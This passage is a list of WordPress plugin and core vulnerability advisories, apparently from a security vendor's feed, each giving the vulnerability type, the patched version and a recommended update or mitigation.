Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RB Internal Links

Vulnerability: Cross-Site Request Forgery to Settings update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPGraphQL

Vulnerability: Unauthenticated Comment Creation
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: Post Status Notifier Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10.1
Recommended Action: Update to version 1.10.1, or a newer patched version

Plugin: Request a Quote

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Testimonial – WordPress Testimonial Showcase Plugin Grid Plus Testimonial Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to Stripe Integration Deletion
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Chronoforms

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Waitlist Woocommerce ( Back in stock notifier )

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Slider Factory – Responsive Photo Slider, Image Slider, Video Slider, Carousel Slideshow

Vulnerability: Missing Authorization
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: WHOIS

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Login History

Vulnerability: SQL Injection via Order By
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Social Sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Timeline Calendar

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Database Administrator

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Event Registration

Vulnerability: PHP Object Injection
Patched Version: 6.03.01
Recommended Action: Update to version 6.03.01, or a newer patched version

Plugin: vodpod-video-gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OAuth Client by DigitialPixies

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.53
Recommended Action: Update to version 2.53, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.4.1
Recommended Action: Update to version 2.1.4.1, or a newer patched version

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via id Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Cross-Site Scripting
Patched Version: 4.52
Recommended Action: Update to version 4.52, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.18.5
Recommended Action: Update to version 1.18.5, or a newer patched version

Plugin: WP Intercom – Slack for WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: E-Search

Vulnerability: Reflected Cross-Site Scripting via title_az parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Privilege Escalation
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 6.15.15.3
Recommended Action: Update to version 6.15.15.3, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘clear_page_cache’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Branded Social Images – Open Graph Images with logo and extra text layer

Vulnerability: Missing Authorization leading to Unauthenticated Plugin Settings Updates
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: cforms

Vulnerability: Cross-Site Scripting
Patched Version: 10.2
Recommended Action: Update to version 10.2, or a newer patched version

Plugin: Random image gallery with pretty photo zoom

Vulnerability: DOM Cross-Site Scripting
Patched Version: 7.5
Recommended Action: Update to version 7.5, or a newer patched version

Plugin: WP eCommerce Shop Styling

Vulnerability: Directory Traversal
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Authenticated File Upload
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Remote Code Execution
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Image Metadata Cruncher

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Landing Page – Squeeze Page – Responsive Landing Page Builder Free – WP Lead Plus X

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Reflected Cross-Site Scripting via section_id
Patched Version: 5.2.4.2
Recommended Action: Update to version 5.2.4.2, or a newer patched version

Plugin: WordPress Poll

Vulnerability: SQL Injection
Patched Version: 34.06
Recommended Action: Update to version 34.06, or a newer patched version

Core: WordPress

Vulnerability: Media Related Security Issue
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WP Responsive Menu

Vulnerability: Missing Authorization to Settings Update & Stored Cross-Site Scripting
Patched Version: 3.1.7.1
Recommended Action: Update to version 3.1.7.1, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress Shout Box Widget

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP eCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.8.7.2
Recommended Action: Update to version 3.8.7.2, or a newer patched version

Plugin: Headless CMS

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All Users Messenger

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Message Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: IP Address Spoofing
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: WP Jump Menu

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Table by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: AntiVirus

Vulnerability: Full Path Disclosure
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP YouTube Live

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: The Buffer Button

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Email

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.3.38
Recommended Action: Update to version 1.3.38, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.22
Recommended Action: Update to version 5.22, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: WooCommerce Multivendor Marketplace <= 3.4.11
Patched Version: 3.4.12
Recommended Action: Update to version 3.4.12, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Adaptive Images for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.6.69
Recommended Action: Update to version 0.6.69, or a newer patched version

Plugin: Dialogs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Validation Bypass via Email Field
Patched Version: 3.4.27.1
Recommended Action: Update to version 3.4.27.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.16
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.16, 3.8.16, 3.9.14, 4.0.13, 4.1.13, 4.2.10, 4.3.6, 4.4.5, 4.5.4, 4.6.1

Plugin: Support Board

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Comment Guestbook

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated (Vendor+) Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Ultimate Gift Cards for WooCommerce – Create WooCommerce Gift Cards, Gift Vouchers, Redeem & Manage Digital Gift Coupons. Offer Gift Certificates, Schedule Gift Cards, and Use Advance Coupons With Personalized Templates

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: SpiderCalendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.65
Recommended Action: Update to version 1.6.65, or a newer patched version

Plugin: Local Weather

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LWS Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: WPBakery Page Builder Clipboard

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: miwoftp

Vulnerability: Arbitrary File Download
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Plugin Names
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.7.7
Recommended Action: Update to version 6.7.7, or a newer patched version

Plugin: FormCraft

Vulnerability: Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Charts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FormBuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wp-Insert

Vulnerability: Arbitrary File Upload
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Slider Hero with Video Background, Animation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization via CR_Manual
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: SearchWP Live Ajax Search

Vulnerability: Directory Traversal and Local File Inclusion
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Shared Files – Frontend File Upload Form & Secure File Sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.57
Recommended Action: Update to version 1.6.57, or a newer patched version

Plugin: Sermon Browser

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.12.1
Recommended Action: Update to version 8.12.1, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Authorization Bypass
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Privilege Escalation via updraft_central_ajax_handler
Patched Version: 1.23.3
Recommended Action: Update to one of the following versions, or a newer patched version: 1.23.3, 2.23.3

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.2.9
Recommended Action: Update to version 7.2.9, or a newer patched version

Plugin: Premium Addons for Elementor

Vulnerability: No subtitle
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: Posts to Page

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Read and Understood

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Contact Bank – Contact Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.226
Recommended Action: Update to version 2.0.226, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Shoppable Images

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Remote Users Sync

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Flexi – Guest Submit

Vulnerability: Guest Submit < 4.20
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘notice’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WP Remote Users Sync

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Log View
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Ultimate Reviews

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.0.16
Recommended Action: Update to version 3.0.16, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Improved user search in backend

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Bootstrap Shortcodes Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Discussion Board – WordPress Forum Plugin

Vulnerability: Authenticated (Subscriber+) Content Injection
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: VigilanTor

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.11
Recommended Action: Update to version 1.3.11, or a newer patched version

Plugin: HTML5 MP3 Player with Playlist Free

Vulnerability: Authenticated (Author+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Insecure Direct Object Reference to Order Manipulation
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Timely Booking Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.9.44
Recommended Action: Update to version 2.9.44, or a newer patched version

Plugin: Event Tickets with Ticket Scanner

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Autolinks Manager – SEO Auto Linker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.05
Recommended Action: Update to version 1.10.05, or a newer patched version

Plugin: WooCommerce

Vulnerability: Unauthorized Order Status Change
Patched Version: 3.5.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.5.10, 3.6.7, 3.7.3, 3.8.3, 3.9.5, 4.0.4, 4.1.4, 4.2.5, 4.3.6, 4.4.4, 4.5.5, 4.6.5, 4.7.4, 4.8.3, 4.9.5, 5.0.3, 5.1.3, 5.2.5, 5.3.3, 5.4.4, 5.5.4, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.1

Plugin: WooCommerce

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Arbitrary Post Access via Shortcode
Patched Version: 5.12.8
Recommended Action: Update to version 5.12.8, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated Arbitrary Plugin Installation
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Local File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Missing Authorization on ‘load_hcaptcha_preview’ AJAX function
Patched Version: 1.23.3
Recommended Action: Update to version 1.23.3, or a newer patched version

Plugin: Code Embed

Vulnerability: Authenticated (Contributor+) Denial of Service
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Curtain

Vulnerability: Unauthenticated Maintenance Mode Enable/Disable
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webcam Video Conference

Vulnerability: Unrestricted File Upload leading to Remote Code Execution
Patched Version: 4.91.9
Recommended Action: Update to version 4.91.9, or a newer patched version

Plugin: Post Connector

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting via azh_save
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Activity Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure (Multi-Part Email Leak)
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Sign-up Sheets

Vulnerability: Authenticated CSV Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Mobile Address Bar Changer

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cost Calculator

Vulnerability: Authenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated Stored Cross-Site Scripting via Advert Names
Patched Version: 5.8.23
Recommended Action: Update to version 5.8.23, or a newer patched version

Plugin: Peter’s Random Anti-Spam Image

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog Grid & Post Grid – Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry, Category Post Grid By News & Blog Designer Pack

Vulnerability: Unauthenticated Remote Code Execution via Local File Inclusion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Chat Button & Custom ChatGPT-Powered Bot by GetButton.io

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.8.10
Recommended Action: Update to version 1.8.10, or a newer patched version

Plugin: DX-auto-save-images

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Web Instant Messenger

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kento Post View Counter

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Forms Puzzle Captcha

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Inactive User Deleter

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.60
Recommended Action: Update to version 1.60, or a newer patched version

Plugin: Social Sharing Plugin – Kiwi

Vulnerability: Arbitrary Options Update
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Accept Stripe Payments

Vulnerability: Unauthenticated Content Injection
Patched Version: 2.0.80
Recommended Action: Update to version 2.0.80, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3.1
Recommended Action: Update to version 1.8.3.1, or a newer patched version

Plugin: YOP Poll

Vulnerability: Author+ Stored Cross-Site Scripting via Preview Module
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: cformsII

Vulnerability: Authenticated SQL Injection
Patched Version: 14.13
Recommended Action: Update to version 14.13, or a newer patched version

Plugin: WooCommerce Bulk Stock Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.34
